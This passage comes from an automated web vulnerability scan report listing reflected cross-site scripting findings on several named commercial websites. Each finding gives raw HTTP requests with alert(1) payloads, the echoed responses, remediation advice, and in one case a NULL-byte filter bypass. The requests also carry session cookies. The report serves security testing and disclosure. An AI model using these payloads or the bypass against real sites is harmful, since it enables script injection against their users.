This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<form class='form' enctype='multipart/form-data' action='/contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1' method='post' >
...[SNIP]...

4.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';
   /*]]>
...[SNIP]...

4.500. https://www.openforum.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
ink = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_homea4b2f'-alert(1)-'731207dc1c%2526inav%253dmenu_business_openforum';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_homea4b2f'-alert(1)-'731207dc1c%26inav%3dmenu_business_openforum';
   /*]]>
...[SNIP]...

4.501. https://www.openforum.com/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
   /*]]>
...[SNIP]...

4.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fa374f'-alert(1)-'7289baab9b9%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?a374f'-alert(1)-'7289baab9b9%3d1';
   /*]]>
...[SNIP]...

4.503. http://www.supermedia.com/business-listings [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
rop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusinessaac2e";alert(1)//8d034beed23";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.504. http://www.supermedia.com/business-listings [tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
p27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusiness";
s.products="";
s.eVar1="";
s.eVar2="SP20b9c";alert(1)//623d3053168";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:34 GMT
Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/
Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top";
s.products="";
s.eVar1="";
s.eVar2="SP198c8";alert(1)//96cb9badcf2";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:45 GMT
Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/
Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
4="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Topb7d7a";alert(1)//5f4e0e8915";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top.647f4";alert(1)//acd0e29ec22";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.508. http://www.supermedia.com/online-advertising [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AdvertiseWithUs6f17b";alert(1)//351308f1023";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.509. http://www.supermedia.com/online-advertising [tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="";
s.products="";
s.eVar1="";
s.eVar2="SPb9e22";alert(1)//51aaefb74c6";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:20 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow">
...[SNIP]...

4.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
